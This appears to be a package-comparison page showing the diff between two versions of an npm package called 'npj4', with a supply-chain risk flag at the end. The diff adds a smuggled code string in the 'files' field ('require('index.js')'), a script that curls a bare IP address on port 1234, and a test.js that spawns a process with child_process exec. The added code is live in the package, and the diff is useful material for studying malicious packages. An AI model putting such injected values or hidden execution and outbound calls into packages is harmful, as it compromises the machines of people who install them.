Comparing version 1.0.39 to 1.0.40
{ | ||
"name": "npj4", | ||
"version": "1.0.39", | ||
"version": "1.0.40", | ||
"description": "", | ||
@@ -13,3 +13,3 @@ "main": "index.js", | ||
"files": [ | ||
"');//" | ||
"');require('index.js');//" | ||
] | ||
@@ -24,3 +24,3 @@ } | ||
"scripts": { | ||
"analyze": "curl http://47.99.124.12" | ||
"analyze": "curl http://47.99.124.12:1234" | ||
}, | ||
@@ -27,0 +27,0 @@ "author": "", |
15
test.js
@@ -1,1 +0,14 @@ | ||
require('testse'); | ||
(async () => { | ||
const a = await import("child_process"); | ||
a.exec("calc", (error, stdout, stderr) => { | ||
if (error) { | ||
console.error(`Error: ${error.message}`); | ||
return; | ||
} | ||
if (stderr) { | ||
console.error(`Stderr: ${stderr}`); | ||
return; | ||
} | ||
console.log(`Stdout: ${stdout}`); | ||
}); | ||
})(); |
Empty package
Supply chain riskPackage does not contain any code. It may be removed, is name squatting, or the result of a faulty package publish.
Found 1 instance in 1 package
1133
5
13
1